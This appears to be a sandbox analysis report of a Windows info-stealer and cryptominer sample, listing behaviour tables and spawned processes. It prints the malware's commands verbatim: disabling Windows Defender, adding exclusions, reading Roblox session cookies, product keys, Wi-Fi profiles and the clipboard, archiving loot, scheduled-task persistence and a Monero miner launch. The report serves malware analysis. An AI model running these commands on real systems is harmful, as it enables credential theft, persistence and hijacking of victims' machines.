| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\rundii32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe
"C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbABxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAdwB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AJwAnAHQAIABzAHQAYQByAHQAIABiAGUAYwBhAHUAcwBlACAATQBTAFYAQwBQADEANAAwAC4AZABsAGwAIABpAHMAIABtAGkAcwBzAGkAbgBnACAAZgByAG8AbQAgAHkAbwB1AHIAIABjAG8AbQBwAHUAdABlAHIALgAgAFQAcgB5ACAAcgBlAGkAbgBzAHQAYQBsAGwAaQBuAGcAIAB0AGgAZQAgAHAAcgBvAGcAcgBhAG0AIAB0AG8AIABmAGkAeAAgAHQAaABpAHMAIABwAHIAbwBiAGwAZQBtAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAYgBlACMAPgA="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA="
C:\Users\Admin\AppData\Local\Temp\rundii32.exe
"C:\Users\Admin\AppData\Local\Temp\rundii32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\rundii.exe
"C:\Users\Admin\AppData\Local\Temp\rundii.exe"
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe
"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"
C:\Users\Admin\AppData\Local\Temp\rundii.exe
"C:\Users\Admin\AppData\Local\Temp\rundii.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iamhdsbc\iamhdsbc.cmdline"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAFB8.tmp" "c:\Users\Admin\AppData\Local\Temp\iamhdsbc\CSC1863D5DC52D143059A9E7E5318577F36.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xRLSp.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xRLSp.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\services64.exe"
C:\Users\Admin\services64.exe
C:\Users\Admin\services64.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=83bM5DoDitniDg2ooQitzWKzapHhSvJmL8kn1dDcr4ST6wU8U6Cj7TN3FRXWJK3fDXNQBRf5TQ5qN2o1aCxi7vrxSi5T26L.ObamaNet --pass=johnlovesbbc --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
